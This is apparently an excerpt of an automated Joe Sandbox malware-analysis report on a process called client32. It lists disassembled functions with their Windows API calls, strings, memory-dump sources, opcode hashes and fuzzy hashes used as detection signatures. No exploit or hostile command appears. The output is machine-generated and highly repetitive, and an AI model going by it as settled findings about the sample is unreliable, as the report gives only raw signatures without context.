                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
                                                                                                                                                                • String ID: ..\CTL32\annotate.cpp$hMenu$hSub
                                                                                                                                                                • API String ID: 468487828-934300333
                                                                                                                                                                • Opcode ID: 48493cce30601763742937afdd0ab3a303765702da106f2b8b4616729fed6b55
                                                                                                                                                                • Instruction ID: 88206e02f8a09737ee9bbd44e9773f646cd5feb9df9992a5a18ccf1b1c6cf3de
                                                                                                                                                                • Opcode Fuzzy Hash: 48493cce30601763742937afdd0ab3a303765702da106f2b8b4616729fed6b55
                                                                                                                                                                • Instruction Fuzzy Hash: 0AF0A73EE946A923D31266F53C09F4BAA484B815ACF470031F928BEA41ED14B40181AA
                                                                                                                                                                Function 110B9950 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 35threadwindowCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetActiveWindow.USER32 ref: 110B9957
                                                                                                                                                                • UpdateWindow.USER32(?), ref: 110B999C
                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 110B99AF
                                                                                                                                                                • PostThreadMessageA.USER32(00000000,?,110BFD1E,00000000), ref: 110B99B6
                                                                                                                                                                  • Part of subcall function 1115AF30: BringWindowToTop.USER32(00000000), ref: 1115AF4F
                                                                                                                                                                Strings
                                                                                                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110B9986
                                                                                                                                                                • m_hWnd, xrefs: 110B998B
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Window$Thread$ActiveBringCurrentMessagePostUpdate
                                                                                                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                                • API String ID: 3644473228-2830328467
                                                                                                                                                                • Opcode ID: 32f23cde9d6ed86436bb722db99f99fd9b4d34dc6e055595a082df120733365c
                                                                                                                                                                • Instruction ID: 160a8c263036174f3a06b351e25fa39776d9e3419cc3da19cf50323da28d6aee
                                                                                                                                                                • Opcode Fuzzy Hash: 32f23cde9d6ed86436bb722db99f99fd9b4d34dc6e055595a082df120733365c
                                                                                                                                                                • Instruction Fuzzy Hash: D9F0C2756507159BD320DBA5DC89F8AF3F4BB44318F004928F222DB5C0C7B0B4048B90
                                                                                                                                                                Function 1115F640 Relevance: 10.5, APIs: 7, Instructions: 33COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 1115F636
                                                                                                                                                                • _free.LIBCMT ref: 1115F64B
                                                                                                                                                                  • Part of subcall function 11162BE5: HeapFree.KERNEL32(00000000,00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162BFB
                                                                                                                                                                  • Part of subcall function 11162BE5: GetLastError.KERNEL32(00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162C0D
                                                                                                                                                                • _free.LIBCMT ref: 1115F654
                                                                                                                                                                • _free.LIBCMT ref: 1115F65D
                                                                                                                                                                • _free.LIBCMT ref: 1115F666
                                                                                                                                                                • _free.LIBCMT ref: 1115F66F
                                                                                                                                                                • InterlockedDecrement.KERNEL32(111EB0C0), ref: 1115F67C
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _free$DecrementDeleteErrorFreeHeapInterlockedLastObject
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 354521468-0
                                                                                                                                                                • Opcode ID: 5fd69fe185bfdf14846da3b8fb65dc386c05d21111fa9652539bbad59113f25c
                                                                                                                                                                • Instruction ID: 4c42a85c9acf0e90f0463cd1b2829a5c81afa7e4bb4e6f88478351abcbf2859f
                                                                                                                                                                • Opcode Fuzzy Hash: 5fd69fe185bfdf14846da3b8fb65dc386c05d21111fa9652539bbad59113f25c
                                                                                                                                                                • Instruction Fuzzy Hash: 1BF08C7A504716ABCA24AFF5DC84C97F7ACEF0C29C3004A08F5A287504DA72F811CBB9
                                                                                                                                                                Function 11147110 Relevance: 9.0, APIs: 6, Instructions: 48threadsynchronizationCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • OpenThread.KERNEL32(0000004A,00000000,11147278,?,?,?,?,?,11147278), ref: 1114713A
                                                                                                                                                                • CreateThread.KERNEL32(00000000,00001000,111470B0,?,00000000,?), ref: 1114715E
                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,?,?,11147278), ref: 11147169
                                                                                                                                                                • GetExitCodeThread.KERNEL32(00000000,00000000,?,?,?,?,?,?,11147278), ref: 11147174
                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,11147278), ref: 11147181
                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,11147278), ref: 11147187
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Thread$CloseHandle$CodeCreateExitObjectOpenSingleWait
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 180989782-0
                                                                                                                                                                • Opcode ID: f968cd3be34acbbfc001fc2c5c2cf1c984ef6abb93f92428a018694f843edebd
                                                                                                                                                                • Instruction ID: 262247fb5796f255492f056fed215dfab2d13c04184fcb9cbdc2136a2e7489e8
                                                                                                                                                                • Opcode Fuzzy Hash: f968cd3be34acbbfc001fc2c5c2cf1c984ef6abb93f92428a018694f843edebd
                                                                                                                                                                • Instruction Fuzzy Hash: 6901FA75D14219ABDB04DFA8C845BAEBBB8EF08710F108166F924E7284D774AA018B91
                                                                                                                                                                Function 110B3090 Relevance: 9.0, APIs: 6, Instructions: 42synchronizationCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • SetEvent.KERNEL32(?,111F00F8,111E5C98,?,110B754E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B30A8
                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,110B7594), ref: 110B30B5
                                                                                                                                                                • CloseHandle.KERNEL32(?,111F00F8,111E5C98,?,110B754E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B30C8
                                                                                                                                                                • CloseHandle.KERNEL32(?,111F00F8,111E5C98,?,110B754E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B30D5
                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,000003E8,111F00F8,111E5C98,?,110B754E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B30F3
                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,110B7594), ref: 110B3100
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseHandle$EventObjectSingleWait
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2857295742-0
                                                                                                                                                                • Opcode ID: de728af195af138cefa6dff90218103564fc584f7cc06855e29f8d807c559bfa
                                                                                                                                                                • Instruction ID: 8ed48fa67f8c8c814876f8dc7215a606f8693e2702a4d531ac155f54366f369e
                                                                                                                                                                • Opcode Fuzzy Hash: de728af195af138cefa6dff90218103564fc584f7cc06855e29f8d807c559bfa
                                                                                                                                                                • Instruction Fuzzy Hash: 46011A75A087049BE7A0DFB988D4A96F7ECEF58300F11592EE5AAC3200CB78B8448F50
                                                                                                                                                                Function 110955C0 Relevance: 9.0, APIs: 6, Instructions: 38COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetSystemMetrics.USER32(0000004C), ref: 110955CE
                                                                                                                                                                • GetSystemMetrics.USER32(0000004D), ref: 110955D7
                                                                                                                                                                • GetSystemMetrics.USER32(0000004E), ref: 110955DE
                                                                                                                                                                • GetSystemMetrics.USER32(00000000), ref: 110955E7
                                                                                                                                                                • GetSystemMetrics.USER32(0000004F), ref: 110955ED
                                                                                                                                                                • GetSystemMetrics.USER32(00000001), ref: 110955F5
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: MetricsSystem
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 4116985748-0
                                                                                                                                                                • Opcode ID: fa9c4e77d45f57ef8ba9ddb2250bc784ae709d2778f265b2a0ca7dc9e2878129
                                                                                                                                                                • Instruction ID: aeea33bb29268792c14f31eb16fa4a6dd0b28b2f7c44b341a1bc9cac054ba08f
                                                                                                                                                                • Opcode Fuzzy Hash: fa9c4e77d45f57ef8ba9ddb2250bc784ae709d2778f265b2a0ca7dc9e2878129
                                                                                                                                                                • Instruction Fuzzy Hash: CAF030B1B5131A6BE7009BAA8C51B55BB9CEB48664F008037A71CC7241DAB5A8108BE4
                                                                                                                                                                Function 110770E0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 111COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • MapWindowPoints.USER32(?,00000000,?,00000002), ref: 1107712B
                                                                                                                                                                  • Part of subcall function 11076470: DeferWindowPos.USER32(8B000EA9,00000000,D8E85BC0,33CD335E,?,00000000,33CD335E,110771C6), ref: 110764B3
                                                                                                                                                                • EqualRect.USER32(?,?), ref: 1107713C
                                                                                                                                                                • SetWindowPos.USER32(00000000,00000000,?,33CD335E,D8E85BC0,8B000EA9,00000014,?,?,?,?,?,1107731A,00000000,?), ref: 11077196
                                                                                                                                                                Strings
                                                                                                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11077172
                                                                                                                                                                • m_hWnd, xrefs: 11077177
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Window$DeferEqualPointsRect
                                                                                                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                                • API String ID: 2754115966-2830328467
                                                                                                                                                                • Opcode ID: 99985b2635142920f8b9c22496a84f2b0050643658386b35a5a33d160634cd24
                                                                                                                                                                • Instruction ID: 41b5b1a8551b5e1f2f99f8414896ea4fcac58e3e889cf17ca758b789060a613c
                                                                                                                                                                • Opcode Fuzzy Hash: 99985b2635142920f8b9c22496a84f2b0050643658386b35a5a33d160634cd24
                                                                                                                                                                • Instruction Fuzzy Hash: E0413EB5A006099FDB14CFA9C884EAAFBF5FF88704F108559E9559B344D770AD00CBA4
                                                                                                                                                                Function 111457A0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 111COMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: HandleModule
                                                                                                                                                                • String ID: %s: $CLIENT32
                                                                                                                                                                • API String ID: 4139908857-407627211
                                                                                                                                                                • Opcode ID: 62a094a11364d479d28b80ef5aae76f7f8a7792226ee52ac438638c336c03449
                                                                                                                                                                • Instruction ID: 56bb3dc9115475832d2b4b6b230f146ae0a9f7ed1e193da0a21f03333bda17cd
                                                                                                                                                                • Opcode Fuzzy Hash: 62a094a11364d479d28b80ef5aae76f7f8a7792226ee52ac438638c336c03449
                                                                                                                                                                • Instruction Fuzzy Hash: 5941153490012B9BD705CF69DC58AEEFBB5EF85709F2046A4E82A87641DB31A64DCF90
                                                                                                                                                                Function 11033760 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 110COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _strncpy$wsprintf
                                                                                                                                                                • String ID: %s (%s)
                                                                                                                                                                • API String ID: 2895084632-1363028141
                                                                                                                                                                • Opcode ID: 9f1f6563b36f78a1914431cce1447dd35063224e54729c55a970a140fe82f433
                                                                                                                                                                • Instruction ID: 90004c4662333843f344f99c31dc4a67423089d3fb31431f761f7f2fe8be3174
                                                                                                                                                                • Opcode Fuzzy Hash: 9f1f6563b36f78a1914431cce1447dd35063224e54729c55a970a140fe82f433
                                                                                                                                                                • Instruction Fuzzy Hash: CF31F3B4E0834A9FE721CF24D8C0BA7BBE8AF45709F004958E9458FB81E7B5E514C7A1
                                                                                                                                                                Function 1109D720 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91windowthreadCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • PostThreadMessageA.USER32(11026AA5,752BF08B,68575608,11198F6C), ref: 1109D796
                                                                                                                                                                • SendMessageA.USER32(00000000,752BF08B,68575608,11198F6C), ref: 1109D7CF
                                                                                                                                                                  • Part of subcall function 1109D650: IsWindow.USER32(?), ref: 1109D66F
                                                                                                                                                                  • Part of subcall function 1109D650: GetClassNameA.USER32(?,?,00000040), ref: 1109D680
                                                                                                                                                                  • Part of subcall function 1109D650: FindWindowA.USER32(?,00000000), ref: 1109D6C1
                                                                                                                                                                  • Part of subcall function 1109D650: Sleep.KERNEL32(?,?,?,?,?,?,?,?,?,1109E8E9,000001F4,00000006,?,11066C00,0000048C,00000001), ref: 1109D6DC
                                                                                                                                                                  • Part of subcall function 1109D650: FindWindowA.USER32(?,00000000), ref: 1109D6ED
                                                                                                                                                                • PostMessageA.USER32(00000000,752BF08B,68575608,11198F6C), ref: 1109D7EB
                                                                                                                                                                Strings
                                                                                                                                                                • m_cds.cbData < m_pSharedHeader->dwDataLen - sizeof(IPCData), xrefs: 1109D772
                                                                                                                                                                • ..\CTL32\ipc.cpp, xrefs: 1109D76D
                                                                                                                                                                Memory Dump Source
